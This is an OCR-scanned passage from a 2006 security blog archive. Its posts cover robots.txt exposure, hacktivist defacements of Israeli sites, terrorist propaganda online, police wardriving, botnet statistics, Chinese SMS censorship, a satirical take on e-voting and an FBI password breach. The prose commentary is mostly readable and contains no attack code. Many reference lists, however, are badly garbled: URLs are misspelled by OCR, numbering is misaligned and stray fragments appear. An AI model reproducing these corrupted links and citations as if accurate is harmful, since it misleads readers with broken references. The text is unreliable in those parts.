moved, 25/30 years old neighbors next to your place, who didn’t know you have [4]thermal 
movement detection equipment and [5]parabolic microphones, in order to seal the house by 
using robots.txt, or assigning the necessary permissions on the web server asap. 


Tip to the Board of Education, don’t bother Google but take care of the problem on your 
own, immediately, [6]through [7]Google’s automatic URL removal system, by first "inserting 
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the appropriate meta tags into the page’s HTML code. Doing this and submitting via the 
automatic URL removal system will cause a temporary, 180-day removal of these pages from 
the Google index, regardless of whether you remove the robots.txt file or meta tags after 
processing your request." 


Going back to the idea of malicious web crawling, the best "what if" analysis comes 
from [8]Michal Zalewski, back in 2001’s Phrack issue article on "[9]The Rise of the Robots" - 
nice starting quote! It tries to emphasize that "Others - Internet workers - hundreds of never 
sleeping, endlessly browsing information crawlers, intelligent agents, search engines... They 
come to pick this information, and - unknowingly - to attack victims. You can stop one of them, 
but can’t stop them all. You can find out what their orders are, but you can’t guess what these 
orders will be tomorrow, hidden somewhere in the abyss of not yet explored cyberspace. Your 
private army, close at hand, picking orders you left for them on their way. You exploit them 
without having to compromise them. They do what they are designed for, and they do their 
best to accomplish it. Welcome to the new reality, where our A.I. machines can rise against 
us." 


That’s a far more serious security issue to keep an eye on, instead of Google’s crawlers 
eating your web site for breakfast. 


1. http: //ddanchev. blogspot .com/2006/02/1look-whos- gonna- cash-for-evaluating. htm 


2. http: //ddanchev. blogspot .com/2006/05/nation-wide-google-hacking-initiative.htm 

3. http: //blog.searchenginewatch . com/blog/060626-085140 

4. http://www.freshpatents.com/Thermal-movement-sensor-dt20060223ptan20060039442. php?type=descriptio 
5. http: //en.wikipedia.org/wiki/Parabolic_microphone 

6. netp: //www. google. co8/ support /vebaasters /bin/anaver py?anawer=35305 

7, cep: //aervices google, con/arlconsole/ controlled 

a, rep: /icentut coredump. cxf 

9, hetp://www. phrack. oxg/show. php?p-57Ra=i 


2.6.24 Delicious Information Warfare - 24/27 June (2006-06-28 02:35) 


Go through my daily reads for [1]13/24 June as well. 


01. [2]Meteorite Collision - "Japanese animation showing what would happen if a giant 
meteor hit the Earth." to [3]Space on june 25 


02. [4]Should We Lift North Korean Sanctions? - "Quentin Hardy summed up his side’s 
argument: “Capitalism has corrupted other authoritarian regimes, why not North Korea?”to 
[5]Investing on june 25 
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03. [6]The ABCs of New Security Leadership - "Maintaining the right level of boardroom 
and employee awareness is a consequence of leadership. And more effective ideas and tactics 
are replacing the old, reactive security leadership paradigm. Below, CSO looks at what’s Out 
and what’s In." to [7]Security [8]Leadership on june 27 


04. [9]Blackmailer : the story of Gpcode - "Analysts at Kaspersky Lab had successfully 
cracked a 660 bit RSA encryption key. This was the latest victory against a cyber blackmailer 
that had been plaguing users in Russia for over a year and a half." to [10]Malware [11]Ran- 
somware on june 27 


05. [12]My Anti-Virus Revolving Door - "I’m the Donald Trump of anti-virus software test- 
ing. It won’t be long before they’re all fired." to [13]Malware [14]AntiVirus on june 27 


06. [15]Eyeballing Israel Signal Facilities - "Israeli Signal Facilities, courtesy of the Eye- 
ball Series." to [16]Security [17]Defense [18]Reconnaissance [19]Satellite [20]GEOINT on june 
27 


07. [21]DHS Special Report Can DHS meet IT cybersecurity expectations? - “In the De- 
fense budget we have put hundreds of millions of dollars in for info. dominance,” Weldon 
said. He cited Pentagon programs to fund universities to launch cybersecurity studies centers 
and to expand the military’s own cybersecurity programs." to [22]Security [23]Defense 
[24]Cyberterrorism [25]Leadership on june 27 


08. [26]Tampa GOP Cyber-Attack - "As the global Islamist war heats up, technically savvy 
cyber-terrorists will continue to look to find weaknesses in the Internet infrastructure of the 
West." to [27]InformationWarfare [28]Cyberterrorism [29]Hacktivism [30]PSYOPS on june 27 


09. [31]Analysis Warns U.S. of Cyber Security Weaknesses - "If our nation is hit by a cy- 
ber Katrina that wipes out large parts of the Internet, there is no coordinated plan in place 
to restart and restore the Internet," said John J. Castellani, President of the Roundtable." to 
[32]Security [33]Defense [34]Cyberterrorism [35]Leadership on june 27 


10. [36]lgnoring the Great Firewall of China - "The so-called "Great Firewall of China" op- 
erates, in part, by inspecting TCP packets for keywords that are to be blocked. If the keyword 
is present, TCP reset packets (viz: with the RST fag set) are sent to both endpoints of the 
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connection.." to [37]Censorship [38]China [39]FreeSpeech on june 27 


11. [40]Encyclopedia of Espionage, Intelligence, and Security - "Espionage information." 
to [41 ]Intelligence [42]Espionage on june 27 


12. [43]China-Led Group to Fight Web Fraud, Cyber Terrorism - "A Russian and Chinese- 
led bloc of Asian states said Thursday it plans to set up an expert group to boost computer 
security and help guard against threats to their regimes from the Internet." to [44]Security on 
june 27 


13. [45]lmmunizing The Internet, Or : How | Learned To Stop Worrying And Love The 
Worm - "In a 1997 exercise, NSA teams hacked into computer systems at four regional military 
commands and the National Military Command Center and showed that hackers could cause 
large-scale power outages and 911 emergency telephone network overloads." to [46]Security 
[47]Defense [48]InformationWarfare [49]Cyberterrorism on june 27 


14. [50]Five Questions For Martin Roesch, Founder and CTO of Sourcefire - "In 1998, 
Roesch created Snort, an app that sniffs out malicious traffic trying to enter a network. Snort’s 
free source code has been downloaded more than 3 million times." to [51]Interview on june 
27 


15. [52]Firms Eye Video Surveillence - "And as the technology shrinks, the cameras slip 
deeper into the background, hardly noticed, streaming more than 4 billion hours of footage 
a week—footage that usually ends up lost, and never seen." to [53]Surveillance [54]CCTV 
[55]Technology on june 27 


16. [56]How big is Earth compared to other planets and stars? - "Fun series of photos 
comparing Earth’s size to that of other planets and stars." to [57]Space on june 27 


17. [58]All-Seeing Blimp on the Rise - "The problem with the American military today is 
that it doesn’t have a giant, robotic airship, two-and-a-half times the size of the Goodyear 
blimp, that can watch over an entire city at once.The idea is to park an unmanned airship over 
a hot zone. to [59]Military [60]Surveillance [61]Privacy on june 27 
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18. [62]Malware in Popular Networks - "Some of the other popular means of computer 
supported collaboration are USENET, IRC, P2P, IM. We have seen a consistent uprise of 
malware targeting these collaborative systems." 


to [63]Malware on june 27 


19. [64]Word macro trojan dropper and (another) downloader - "We've seen a lot of 
new malware being spammed in last couple of hours." to [65]Malware on june 27 
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40. 

41. 

42. 

43. http://www.technewsworld.com/story/W8Hy0zsX6GC9iy/China-Led-Group-to-Fight-Web-Fraud-Cyber-Terrorism.x 
= 

45. http://www. harvardlawreview. org/issues/119/june06/note/immunizing the_internet.pdf 

46. 

47. 

48. 

49. 

50. http://www. informationweek.com/news/showArticle. jhtml?articleID=189500016 

51. 

52. http://www.redherring.com/Article.aspx?a=17371&%hed=FirmstEye+Video+Surveillence/OD/0A 

53. 


54, 

55, 

56. 

57. 

58. 

59, 

60. 

61. 

62. 
63. 


64. http://isc.sans.org/diary.php?storyid=1447k%isc=4da9a5a6ffa3426c34d3e2c501f£1125c 


65. http://del.icio.us/DDanchev/Malware 


2.6.25 Tracking Down Internet Terrorist Propaganda (2006-06-29 03:27) 


| always knew there’s a team of cheap marketers behind every terrorist organization trying 
to market yet another multimedia killing, or put it simple fear, treats, and no respect for life. 
Why cheap? Mainly because there’s no segmentation or niche issues to deal with, but mostly 
mass marketing, while harnessing the power of the never ending resonation from the media 
echo. 


Rather biased, today’s opinion on [1]Cyberterrorism always has to do primarily with de- 
struction as the core of the problem. Active research is already conducted on "[2]Arabic 
Extremist Group Forum Messages’ Characteristics" and "[3]Terrorist Social Network Analysis", 
and the real issues still remain communication, research, fundraising, propaganda, recruit- 
ment and training - | wish [4]Dorothy Denning was also blogging on the topic! 


iDefense, being the [5]masters of [6]CYBERINT, recently [7]found jihadist web sites re- 
lated to Zarqawi's "Successor". The interesting part : 
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"This website contains forums with a mix of threads covering items from the latest infor- 
mation on the militants in the Middle East, such as a video of militants in Syria, to hacker 
education, such as Microsoft Word documents available for downloading that detail CGI, 
unicode and php exploits. The members appear to be interested in physical and cyber-related 
threats. The membership of the site is growing and is already over 10,000+ members. Plus, 
we at iDefense/VeriSign are very interested to see what hacking issues or levels of cyber 
expertise may be covered on this site." 


By the way, | just came across to an outstanding [8]list of Islamic sites at [9]Cryptome. 
These are definitely about to get crawled, analyzed, and for sure, [10]under attack in the fu- 
ture. For instance, the most recent example of [11]hacktivism tensions, are the [12]hundreds 
of hacked Israeli web pages, in the light of Israel’s military action in Gaza. 


Further reading on: 

[13]Terrorism 

[14]Cyberterrorism 

[15]How Modern Terrorism Uses the Internet 

[16]Jinad Online : Islamic Terrorists and the Internet 
[17]Right-wing Extremism on the Internet 

[18]Terrorist web sites courtesy of the [19]SITE Institute 
[20]The HATE [21]Directory November 2005 update 


[22]Recruitment by Extremist Groups on the Internet 


1. http://ddanchev. blogspot . com/2006/05/techno-imperialism-and-effect-of . html 

2. http: //ddanchev blogspot . com/2006/05/arabic-extremist-group-forum-messages . html 
3. http: //ddanchev. blogspot. com/2006/05/terrorist-social-network-analysis. html 

4. http://www. cosc. georgetown. edu/~denning/ 

5. http: //idefense .com/methodology/ 
6 
7 
8 
9 


. http: //www.cert .org/archive/html/spie.htm 


ttp://counterterrorismblog.org/2006/06/internet_security_team_finds_j.php 


. http://tajdeed-list.net/pipermail/pir_tajdeed-list .net/2006- June/000092. htm 
fo eee oe) 
10. 
11. 


12. http://www. jpost .com/servlet/Satellite?cid=115088587 1095&pagename=JPost/,2F JPArticle42FShowFull 


13. http://del.icio.us/DDanchev/Terrorism 
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18. http://siteinstitute.org/websites .htm 


2.6.26 North Korea - Turn On the Lights, Please (2006-06-29 03:56) 


[1]North Korea’s recent missile launch furor, and the obvious conventional weaponry doctrine 
in place, as well as my comments in the [2]Travel Without Moving series - Korean Demilitarized 
Zone, reminded me of a how they tend to fuel growth in military spending/[3]the regime, 
where the trade-off is a developing economy, or any economy at all. | feel [4]North Korea is 
still quite dark these days, very impressive imagery showing that : 


"South Korea is bright, North Korea is dark. This amazing image is included in the stan- 
dard US Department of Defense briefings on North Korea. It was mentioned in a [5]news 
briefing on 23 December 2002 by Defense Secretary Rumsfeld, who stated that "If you look 
at a picture from the sky of the Korean Peninsula at night, South Korea is filled with lights 
and energy and vitality and a booming economy; North Korea is dark." There are a number 
of versions of this image in circulation, with visible differences that vary according to the 
conditions at the time the imagery was acquired." 


Rich Karlgaard’s comment on [6]lifting North Korea sanctions, and Quentin Hardy’s argu- 
ment that "Capitalism has corrupted other authoritarian regimes, why not North Korea?”are 
worth taking into consideration. 


2.6.27 The WarDriving Police and Pringles Hacking (2006-06-30 03:52) 
These days you never know where the next hacking attempt on your wireless network may 


come from. In this case, it’s from the police, as [l]Jauthorities start mimicking wardriving 
behavior : 
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"The Douglas Country Sheriff's DOffice says it’s going to start warning computer users 
that their networks may be vulnerable to hackers. The Sheriff’s Department plans to equip 
several of its community service and patrol cars with devices that detect unprotected com- 
puter networks. In cases where investigators can figure out who owns the networks, they'll 
try to warn of potential security issues. They'll also drop off brochures with instructions to 
computer users on how to password protect their networks." 


Back in 2004, Kelly Martin wrote a very pragmatic article on [2]Catching a virus writer, 
empasizing on how "with the consumer WiFi explosion, launching a virus into the wild has 
never been easier and more anonymous than it is today." Moreover, Kaspersky labs recently 
assessed the [3]situation in England, and you can easily see the need of basic awareness 
there. 


| don’t feel it’s a good idea mainly because it generates more noise for the end user to 
sort through. They’d rather assess and position on a map the regions with most vulnerable 
networks and figure out a cost-effective ways of spreading awareness in these regions, instead 
of taking the role of an ethical wardriving. On the other hand, if they start taking care of 
wireless, would they start [4]taking into consideration [5]Bluetooth as well? There’re just too 
many ethical wardrivers to deal with and [6]deceive these days, and creative end users tend 
to [7]multiply themselves or, of course, use common sense protection. 


WarDriving Awareness brochure courtesy of [8]Tom Hayward. Recommended reading - 
"[9]War, Peace, or Stalemate: Wargames, Wardialing, Wardriving, and the Emerging Market 
for Hacker Ethics". 


1. http://www. 9news.com/acm_news .aspx?0SGNAME=KUSA&IKOB JECT ID=1db245df -Oabe-421a-019d-d112657c4feb&TEMPLATEI 


D=0c76dce6-acif-02d8-0047-c589c01ca7bf 


ttp://www.securityfocus.com/columnists/246 


ttp://www.viruslist .com/en/analysis?pubid=187008611 


ttp://trifinite.org/Downloads/21c3_Bluetooth_Hacking.pd 


ttp://www.viruslist .com/en/analysis?pubid=188833782 


2. 
3. 
4. 
Di 
6. http: //www.remote-exploit .org/index.php/Hotspotte 
Ti 
8. 
9. 


ttp://packetstorm. linuxsecurity.com/wireless/fakeap-0.2.tar.gz 
ttp://www.tomh.us/ 


ttp://papers.ssrn.com/sol3/papers.cfm?abstract_id=58586 


2.6.28 Real-Time PC Zombie Statistics (2006-06-30 04:56) 


Zombies inevitably turning into [1]botnets represent a huge, automated and efficient advan- 
tage to [2]malicious attackers, | topic and most of its dimensions | covered in my [3]Future 
trends of malware research. [4]CipherTrust’s Zombie Stats help you measure the approximate 
population of infected zombie PCs according to the vendor’s [5]TrustedSource. Not surprisingly, 
China’s steadily increasing novice Internet population, both represents a growing menace to 
the entire Internet, and a market development opportunity for AV and security vendors. The 
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situation is getting of hand with ISPs upgrading Internet connections, while still not putting 
enough efforts when it comes to dealing with botnets. And while some are [6]taking actions 
under enforcement, major [7]ISPs are still reluctant to face the issue - ISPs still prefer to offer 
security services on a license basis or through reseller partnerships, though I’m certain there’s 
an entire market segment waiting to be discovered by them if they manage to reset their 
position in this space. 


Moreover, [8]Prolexic’s Zombie report for Q1-Q2 2005, provides even more detailed info, 
and a neat [9]visualization of the routes involved with DDoS attacks, where the blue repre- 
sents the U.S, and the red China. For the the time being, the [10]ShadowServer guys keep on 
enthusiastically dealing with the problem, for no profit at all. 


1 
2 
3 

4 
5. 
6. 
7. 


ttp://www.trustedsource.org/ 
ttp://news.com.com/Australian+ISPs+tapped+to+kill+zombies/2100-7348_3-5938170.htm1 


ttp://www.zdnet.com.au/news/security/soa/ISPs_accused_of_ignoring botnet_invasion/0, 2000061744, 39257307, 
8. http://www. prolexic.com/zr/ 


9. http: //ddanchev. blogspot .com/2006/03/visualization-in-security-and-new.htm 
10. http: //www.shadowserver.org/ 


2.7 July 


2.7.1 Hacktivism Tensions - Israel vs Palestine Cyberwars (2006-07-01 17:18) 


Oops, they [1]did it again. The most recent case of [2]hacktivism recently occurred : 


"Shortly after IDF tanks rolled into Gaza, another old front of conflict was reopened early 
Wednesday morning, but in this battle Kassam rockets and artillery shells were replaced 
by worms and viruses as pro-Palestinian hackers shut down approximately 700 Israeli web 
domains. A range of different Web sites were targeted by the group, including Web sites of 
banks, medical centers, car manufacturers and pension funds.Well-known companies and 
organizations, including Bank Hapoalim, the Rambam Medical Center, Bank Otsar Ha- 
Hayal, BMW Israel, Subaru Israel and Citr en Israel, real estate company Tarbut-Hadiur 
and the Jump fashion Web site all found their Web sites shut down and replaced by the 
message: Hacked by Team-Evil Arab hackers u KILL palestin people we KILL Israel servers." 
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[3]Zone-H has naturally covered the event and mirrored it, in between receiving an offi- 
cial PR release from the defacement group - guess it’s not just [4]terrorists with cheap 
marketing teams given the badly structured press release. What these folks don’t seem to be 
able to realize is that if they were to deface every web site hosting the infamous [5]Muhammad 
cartoons, they would end up with a full-time job doing so. What’s worth mentioning is the 
nature of defaced servers, banks, hospitals, private sector companies, my point is that if they 
were really up to causing havoc, they had the necessary privileges to do so. Let’s not think on 
loud on worst case "what if" analysis though. 


[6]Defacements are a great example of [7]PSYOPS , most importantly the indirect way 
of undermining a country’s population confidence in their abilities to win any war or political 
campaign. During WWII brochures were laying around everywhere, and planes were dropping 
them across various cities to, either undermine, of influence the opinion of the locals towards 
their vision. The power of the Internet echo is what they’re aiming to achieve, and while | 
may be whispering their "achievements" even further, the visitors of the affected sites partly 
got exposed to their propaganda. It’s also to interesting to think of PSYOPS in reverse, that 
is [8]users in countries with restrictive regimes trying to reach out the rest of world through 
malware - [9]beneficial [10]malware, or beneficial PSYOPS? 


What the current, emerging and future state of Hacktivism? In her outstanding research 
titled "[11]Hacktivism and the Future of Political Participation", Alexandra Samuel points out 
some of the key points to keep in mind, and constructively speculates on the future trends. 


At the bottom line, what’s all the fuss about? No, it’s not because an Israeli covert oper- 
ative was kidnapped and held hostage, but because of an 18 years old "[12]destruction 
machine" which reminds me of the way we used to argue and wage wars on the sand around 
the same age. The type of, "the wind has just blown your soldier way beyond the DMZ, and 
therefore we have no other choice but to attack you with all our forces. Resistance is futile!" 
conflicts. 


Go to school, hell, even go to an ethical hacking one, or else you’ll end up like a walk- 
ing sausage having to squeeze yourself with a belt so tight in order not to have your pants fall 
down! Automated defacement tool shot courtesy of [13]WebSense. And btw, how was your 
[14]July Morning? 


Related resouces : 
[15]lsraeli-Palestinian Cyberconflict (IPCC) - the complete coverage back in 2001! 


[16]The Israeli-Palestinian Cyberconflict 
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[17]Activism, Hacktivism, and Cyberterrorism : The Internet as a Tool for Influencing For- 
eign Policy 


[18]The Cycle of Cyber Conflict 

[19]Cyber Attacks During the War on Terrorism 

[20]Examining the Cyber Capabilities of Islamic Terrorist Groups 
[21]Cyberprotests : The Threat to the U.S Information Infrastructure 
[22]Analysis: U.S.-China ’cyberwar’ fires blanks 

[23]Techno Imperialism and the Effect of Cyberterrorism 
[24]Cyberterrorism - don’t stereotype and it’s there! 


[25]Cyberterrorism - recent developments 


. http://www. jpost .com/servlet/Satellite?cid=115088587 1095&pagename=JPost/,2FJPArticle/2FShowFul 


1 

2. beep: //photoss blogger. con/blogger/1999/1770/1600/uacktivis jpg 

3, http://www. zone-b. org/ content /view/19701/30/ 

4, netp://ddanchev. blogspot .com/2006/06/eracking- dowi-internet-vervoriat heal 
5, htap://exyptone,org/mukauned. ta 

6. : -h. i 

8 
9 


. http: //www.ravantivirus.com/virus/showvirus. php?v=216 
( eee 
10, http: //wevpeople frisk-softvare con/~bontchev/papors/goodvir all 


. http: //www.alexandrasamuel .com/20060510/now-available-hacktivism-the-future-of-political-participatio 


12. fittp://en, wikipedia. org/vaki/Rabd 
_netp:/ /wuv.uebsense.con/securstylabs/bolog/ 
| hetp:/ /wuv.securitymanagenent con/Iibrary/Israeli_pales0401. pdf 


. http://www.soc.utu.fi/polhist/vaihtuvat/jokisipila_Interfada. pdf 
17, http: //eey.rand.or§/pubs/onograph_ reports /HK1382/HR1382 ch pa 
t 
t 
t 


p://www.rand.org/pubs/monograph_reports/MR1382/MR1382.ch8.pdf 
p://militaryreview. army .mil/download/English/MarApr03/allen. pdf 
tp://www.ists.dartmouth. edu/library/164.pd 
tp://www.au.af.mil/au/awc/awcgate/nipc/cyberprotests.pd 

tp://ddanchev. blogspot .com/2006/05/techno- imperialism-and- -of. 
tp://ddanchev. blogspot .com/2005/12/cyberterrorism-dont-stereotype-and-its.htm 
tp://ddanchev. blogspot .com/2006/01/cyberterrorism-recent-developments.htm 


] 
] effect-of.htm 


21. 


2.7.2 China’s Interest of Censoring Mobile Communications (2006-07-02 02:53) 


Just came across to a great article at the IHT on [1]China’s interest of tightening control of 
cellphones : 
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"The new measures being contemplated for tightening control of cellphone use report- 
edly include mandatory user registration. Users now can easily buy cellphone cards at any 
convenience store, instantly obtaining a new phone number without identifying themselves. 
Whether through speech or short messaging, cellphones have played a major role in a wave 
of social unrest that has swept China in the last two years, allowing people to organize quickly 
and to spread news of police actions and other developments. Anonymous use of cellphones is 
a major loophole at a time when the state is investing heavily on monitoring communications 
of all kinds, and the authorities appear determined to close it" 


Whereas there’s been quite some media coverage on China’s Internet censorship efforts, 
the country’s under-developed income distribution model results in more people having 
access to plain simple cellphone communications compared to owning a PC. And even if 
they own a PC, or use public ones to access the Internet, information from China’s provinces 
where the real China is, often breaks out through SMS messages - or [2]comes in. Venus Info 
Tech’s [3]Cybervision SMS Filtering System is what they’ve been using, and it seems it’s the 
government’s long-term partner. The article also points out on the illegality of reporting or 
broadcasting information on "sudden events", consider the [4]SARS virus as one of these. Yet 
another in-depth article, indicates the only [5]usefulness out of this censorship, or let’s use 
a more friendly term, such as content monitoring/filtering, which is the detection of banking 
frauds and other scams - can you censor "[6]Bware, SMS unda ctrl" or learn to encode in such 
a way? 


From a business perspective, the [7]Chinese Internet population represents a hot opportunity 
for companies offering censorship-circumvention services - [8]IP cloaking and competitive 
intelligence among the other needs. It’s interesting to note U.S government’s interest in 
Chinese citizens having access to more information : 


"Ultrareach and Dynamic Internet Technology (DIT) in North Carolina, both connected to 
Falun Gong, receive U.S. government funding through the International Broadcasting Bureau 
to help it get Voice of America and Radio Free Asia to Chinese Web surfers. Each day, DIT sends 
out millions of emails and text messages containing proxy links to Chinese citizens. About 
one million users have downloaded DIT’s circumvention software, which automatically links to 
the firm’s proxy servers, while “hundreds of thousands” directly access the proxy Web sites 
daily, said founder Bill Xia. UltraReach, claims 100,000 users use its proxies.All told, the IBB 
spends about $5 million a year on contracts with hacktivists and firms on censorship-busting 
efforts in countries such as China and Iran." 


| also came across to an informative research on the topic, "[9]The Wireless Leash : Mo- 
bile Messaging Service as a Means of Control". Recommended reading in case you want to 
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know more on the topic from a social and political perspective, as well as go through many 
relevant cases. 


UPDATE : [10]China restricts Internet cafe access - "Rules on children in Internet cafes 
were imposed after Chinese officials warned that students were spending too much time 
playing online games and were getting access to violent and obscene material." 


Related resources: 

[11]Censorship 

[12]China 

[13]2006 = 1984? 

[14]Anonymity or Privacy on the Internet? 

[15]World’s Internet Censorship Map 

[16]China - the biggest black spot on the Internet’s map 
[17]Chinese Internet Censorship efforts and the outbreak 


[18]Securing political investments through censorship 


. http://www. iht.com/articles/2006/06/30/news/china.php 


ttp://www.usatoday.com/tech/news/2005-06-30-politics-text-tool_x.htm?csp=34 


. http://www. venusense. com/html1/product/product_08.htm 
. http: //www.theepochtimes.com/news/4-7-12/22391.htm 


1 
2 
3 
4 
5. http://www. bloomberg. com/apps/news?pid=10000080&sid=aE87osXqUmRwkrefer=asia 
6 
7 
8 
9 


ttp://www.rsf.org/article.php3?id_article=10870 


. http: //www.mercurynews.com/mld/mercurynews/14948550 . htm 
. http: //ddanchev. blogspot .com/2005/12/ip-cloaking-and-competitive.htm 


ttp://ihome. cuhk. edu.hk/~b200167/files/qiu_wireless_leash.pdf 


10. http: //news. yahoo. com/s/ap/20060703/ap_on_hi_te/china_internet_crackdo 
http://del.icio.us/DDanchev/Censorship 


| http: / /del. icio.us/DDanchev/ China 
13, ietp: //adanchev blogspot .con/2006/04/2006-1984. uta 
_netp:/ /adanchev. blogspot .con/2006/06/sords~internet-censorship-eap. heal 


. http: //ddanchev.blogspot .com/2006/01/china-biggest-black-spot-on-internets.htm 


17. http: //ddanchev.blogspot.com/2006/02/chinese-internet-censorship-efforts.htm 
18. http: //ddanchev.blogspot .com/2006/04/securing-political-investments-through.htm 
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2.7.3 BBC under the Intelligence Shadow (2006-07-03 00:57) 


Nothing is impossible, the impossible just takes a little while. A relatively typical practices for 
the ex-USSR, namely controlling the media and profiling the journalists including the readers, 
seem to have been going on in London during the same period as well. According to the 
Sunday Telegraph, the [1]BBC let intelligence agents vet staff : 


"Confidential papers obtained by the Sunday Telegraph reveal that the British Broadcast- 
ing Corp. allowed intelligence agents to investigate the backgrounds and political affiliations 
of thousands of its employees, including newsreaders, reporters and continuity announcers. 
The files, which shed light on the BBC’s hitherto secret links with the counter-espionage 
service known as MI5, show that at one stage it was responsible for vetting 6,300 BBC posts - 
almost a third of the total work force. The procedure was phased out in the late 1980s. The 
files also show that the corporation maintained a list of "subversive organizations" and that 
evidence of certain kinds of political activity could be a bar to appointment or promotion." 


If you can spell the name of the party while sleeping, and have subscribed to its periodi- 
cal propaganda, only then you have the chance to unleash your career potential. | guess what 
they were worried about was an undercover Red reporter , taking advantage of live events and 
directly broadcasting a subvertive message - remember when a guy invaded Truman’s world 
in the "Truman show", and tried to warn the little kid he’s on TV all the time? The interesting 
part is how even the spouses of applicants were subject to scrutiny. 


There you go with the freedom of the press, | guess China must have had something in 
mind when blocking access to the BBC’s web site. 


1. http: //washingtontimes.com/world/20060701- 105304-4152r .htm 


2.7.4 How to Win the U.S Elections (2006-07-05 14:51) 


Juicy barbecues, hugging babies, in between offering, and asking for the Moon days are over. 
E-voting is the future of technological political engineering. So, how can you win the U.S 
Elections? 


01. Ensure one company holds a virtual monopoly in E-voting systems, thus contribut- 
ing to yet another monocultural insecurity. If it naturally has some competition, insist its 
systems are placed in key regions, where barbecues wouldn’t work. 


02. Start a nation-wide PR campaign emphasizing on the benefits of E-voting. Mention 
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it’s innovative, it’s going to cut costs while providing you with flexibility, the way it provides 
flexibity to citizens abroad, moreover, also emphasize on the increased speed of the results. 


03. Make sure the rural areas where the masses of technologically unsophisticated citi- 
zens are the ones taking advantage of this immature concept. The point is that, even if there’s 
an error, they got no chance of defining it. 


04. If something "goes wrong" forward all the responsibility to the virtual monopolist, 
and promise pracautions against future possiblities for modifying the results - anyway, sorry 
folks the elections are over, so till next time keep on speculating what actually happened. 


Meanwhile, on the other side of the universe, where we should perhaps thank Jessus 
for coming up with more colours in live, than black and white only, | stumbled upon an 
[1]Unredacted Diebold Black Box Voting Hack Reports with quite some disturbing images. 
Make sure the efficincy that you wish for, doesn’t actually happen. A friend also tipped me 
on this quite [2]longish report on the topic, and didn’t forget to warn me to remove my 3D 
glassess before reading it either. 


UPDATE : [3]Interesting political reading related to veto power. 


Clippy votes courtesy of the [4]EFF. 


1. http: //cryptome. org/bbv070306.htm 
2. http://www. brennancenter .org/programs/downloads/Full%20Report. pdf 

3. http://www. cnn.com/2004/ALLPOLITICS/01/07/elec04.prez.bush.no.vetoes.ap/ 
4. ‘ ivi -voti 


http://www.eff.org/Activism/E-voting/ 


2.7.5 Travel Without Moving - North Korea Missile Launch Pad (2006-07-06 03:03) 


Seems like it’s North Korea’s most active PR month given the [1]public outbreak due to 
their unsuccessful launch of an intercontinental missile, so in these Travel Without Moving 
series | decided to feature the launch pad, originally came across it, nowhere else but at 
[2]Cryptome’s well sorted photo gallery of the event. Whereas the U.S is activating diplomatic 
ties in order to put more pressure on North Korea’s tests, [3]China and Russia among the rest 
of the superpowers seems to be teasing the U.S in a way only they can afford to - let’s don’t 
forget the financial incentives for [4]Russia to enrich Iran’s uranium altogether. As far as Kim 
Jong Il is concerned, in between fueling growth in the [5]infrastructure necessary to maintain a 
regime, he [6Jenjoys making [7]secret meetings with ex-comrades while travelling to Moscow 
with his armoured train, as he’s afraid of flying. 
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Previous series, related posts : 

[8]Travel Without Moving - Typhoon Class Submarines 

[9]Travel Without Moving - Cheyenne Mountain Operations Center 
[10]Travel Without Moving - KGB Lubyanka Headquarters 

[11]Travel Without Moving - Korean Demilitarized Zone 

[12]Travel Without Moving - Georgi Markov’s KGB Assassination Spot 


[13]Travel Without Moving - Scratching the Floor 


[14]North Korea - Turn On the Lights, Please 
[15]Who Needs Nuclear Weapons Anymore? 
[16]Who’s Who in Cyber Warfare? 

[17]ls a Space Warfare Arms Race Really Comming? 


[L8]EMP Attacks - Electronic Domination in Reverse 


1. http://www. voanews.com/english/2006-07-05-voa22. cfm 
2. http://cryptome.org/dprk-furor/dprk- eyeball. htm 
3 


ttp://news .yahoo.com/s/ap/20060705/ap_on_re_as/un_north_korea_10;_y1lt=AmpE051YL_QOCDvjFOd6VviCscEA;_ylu 


X30DMTBiMWO4NW9mBHN1YwM1 JVRPUCU 


4. hbttp://www.smh.com.au/news/world/iran-russia-reach-agreement-to-enrich-uranium/2006/02/27/1140888771985. 


. http://www. hrnk.org/hiddengulag/toc.htm 
. http: //news.bbc.co.uk/2/hi/europe/1476466.st: 


5 
6 
7. http://english.ohmynews.com/ArticleView/article_view.asp?menu=A11100&no=301166&rel_no=1&back_url 
8 
9 


_hetp://adanchey. blogepotcon/2006/05/travelvithout~noving-typhoon-claes hal 
_hetp://adanchev. blogspot .con/2006/05/travel—uithout~noving-cheyenne tal 
10, http: //adanchev blogspot .con/2006/06/travel-vithout-noving- ky lubyanks, heal 
_http:/ /adanchev. blogspot .con/2006/05/travel-vithout~noving-Korean_27 tal 
 itep://Adanchey, blogepotcon/2006/06/ravel- without” aoving”goorgi-uarkovs. hia 
_http:/ /adanchev. blogspot .con/7006/05/travel-uithout~noving-scratching-flo0r bea 
_hutp://adanchev. blogspot .con/2006/02/sho-needs~niclear~veapons-anynore.htal 
| http://ddanchev. blogepot con/2006/05/shos- vho~in-cyber~var fare. html 
_http://adanchev. blogspot .con/7006/03/s~space-uartare-arms-race-really tal 


ttp://ddanchev. blogspot .com/2006/05/emp-attacks-electronic-domination-in. htm 
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2.7.6 $960M and the FBI’s Art of Branding Insecurity (2006-07-06 10:31) 


In previous posts "[1]Are cyber criminals or bureaucrats the industry’s top performer?", and 
"[2]Insiders - insights, trends and possible solutions" | emphasized on how bureaucracy results 
in major insecurities, and provided further info on various issues related to insiders and 
[3]risk [4]Jmanagement [5]solutions - ones the FBI is obviously far from implementing given 
the access control issues they have in place. It seems like two years ago, a [6]Consultant 
Breached FBI’s Computers : 


"A government consultant, using computer programs easily found on the Internet, man- 
aged to crack the FBI’s classified computer system and gain the passwords of 38,000 
employees, including that of FBI Director Robert S. Mueller III]. The break-ins, which occurred 
four times in 2004, gave the consultant access to records in the Witness Protection 
Program and details on counterespionage activity, according to documents filed in U.S. 
District Court in Washington. As a direct result, the bureau said it was forced to temporarily 
shut down its network and commit thousands of man-hours and millions of dollars to ensure 
no sensitive information was lost or misused." 


How he did it? With access to hashes and 90 days password expiration period, he had 
all the time in the world, excluding the fact that according to the article a FBI agent even 
game him his password. 


[7]Passwords are a hot topic, and so are the [8]insecurities posed by them. Moreover, 
spending near $1B for a non-existent case system, while dealing with access control issues 
is rather unserious for thought to be serious institution - have you guys considered an open 
source alternative? You wouldn’t come across lots of developers with top-secret clearances 
applying for the top, but obviously a top-secret clearance cannot prevent [9]insider behavior 
as well. 


http: //ddanchev. blogspot .com/2006/03/are-cyber-criminals-or-bureaucrats .htm 


1. 

2. http: //ddanchev. blogspot .com/2005/12/insiders-insights-trends-and-possible.htm 
a RE 

4. http://www. reconnex.net/ 

5 ce oes saci cee] 
6. 
7. 
